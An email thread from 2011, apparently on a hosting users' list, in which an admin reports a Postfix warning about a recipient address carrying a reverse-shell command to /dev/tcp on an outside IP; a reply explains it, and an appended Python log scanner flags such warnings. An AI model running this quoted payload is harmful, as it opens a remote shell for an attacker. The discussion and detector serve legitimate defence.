No worries,
Reading about attempted exploits like this is often helpful for people, as
it shows them that there is a very real threat out there to servers that are
not up to date. I also find it interesting to see what they get up to these
days...
Daniel
On 11 February 2011 11:13, Alastair Sherringham <sherringham(a)gmail.com> wrote:
Thanks. All seems OK as far as I can see (AIDE check etc.) and I am up
to date with security. I like to put this sort of thing in the open
and ask, at least if it's "unusual" (to me). Thanks for the follow-up.
On 11 February 2011 11:07, Daniel Case <danielcase10(a)gmail.com> wrote:
It seems the user was trying to get a shell delivered to their TCP stream. I
have heard of an exploit like this, it was plugged quite quickly though so
as long as you are up to date you should be fine.
By the looks of it postfix blocked it as an illegal address so I wouldn't
worry too much, it will have delivered it as a normal email :)
Daniel
On 11 February 2011 09:29, Alastair Sherringham <sherringham(a)gmail.com>
wrote:
I received an interesting email today. I only noticed because I had
logged in SSH and got the "you have new email" message. Reading via
"mail", I see :
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
1>&0 2>&0"(a)calliope.bitfolk
Obviously some sort of possible exploit. The IP address 87.106.250.176
is Germany (1&1 Internet).
Postfix reported :
warning: 36FE51381A3: address with illegal extension: root+:|exec
/bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
But it was delivered. I hope nothing bad has happened. I am running
AIDE as we speak and digging around.
Cheers,
--
Alastair Sherringham
http://www.sherringham.net
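A way to watch for the Postfix warning quoted in this thread, as an added example that is not part of the original messages: a Python scanner that picks "address with illegal extension" warnings out of a mail log and grades each one by whether the extension carries shell metacharacters or a /dev/tcp target. The syslog prefixes, the second queue ID, the third log line and the names `scan` and `SAMPLE_LOG` are constructed for illustration; only the warning text itself comes from the thread.

```python
import re

# Postfix warning format as quoted in the thread:
#   warning: <queue-id>: address with illegal extension: <local part>
WARN_RE = re.compile(
    r"warning: (?P<qid>[0-9A-F]+): address with illegal extension: (?P<addr>.*)$"
)
# Shell network-redirection target, as seen in the quoted recipient address
DEVTCP_RE = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[0-9A-Za-z.\-]+)/(?P<port>\d+)")
# Characters that have no place in a mailbox extension
SHELL_META = set("|;&<>`$")

# Constructed sample log. Line 2 wraps the thread's warning in an assumed
# syslog prefix; lines 1 and 3 are invented to exercise the other paths.
SAMPLE_LOG = [
    "Feb 11 09:20:01 calliope postfix/smtpd[1201]: connect from unknown[192.0.2.10]",
    "Feb 11 09:20:02 calliope postfix/local[1204]: warning: 36FE51381A3: "
    "address with illegal extension: root+:|exec /bin/sh "
    "0</dev/tcp/87.106.250.176/45295 1>&0 2>&0",
    "Feb 11 09:21:10 calliope postfix/local[1210]: warning: 0A1B2C3D4E5: "
    "address with illegal extension: alice+weird/path",
]

def scan(lines):
    """Return one finding per illegal-extension warning, with a severity."""
    findings = []
    for line in lines:
        m = WARN_RE.search(line.rstrip("\n"))
        if not m:
            continue
        user, _, ext = m.group("addr").partition("+")
        meta = sorted(SHELL_META & set(ext))
        endpoints = [(e.group("host"), int(e.group("port")))
                     for e in DEVTCP_RE.finditer(ext)]
        # high: names a network endpoint; medium: shell syntax only
        severity = "high" if endpoints else ("medium" if meta else "low")
        findings.append({"queue_id": m.group("qid"), "user": user,
                         "extension": ext, "shell_meta": meta,
                         "endpoints": endpoints, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["queue_id"], f["user"], f["endpoints"])
```

The extracted endpoints can be checked against firewall or netflow records for outbound connections from the mail host, which complements the AIDE file-integrity check mentioned in the thread.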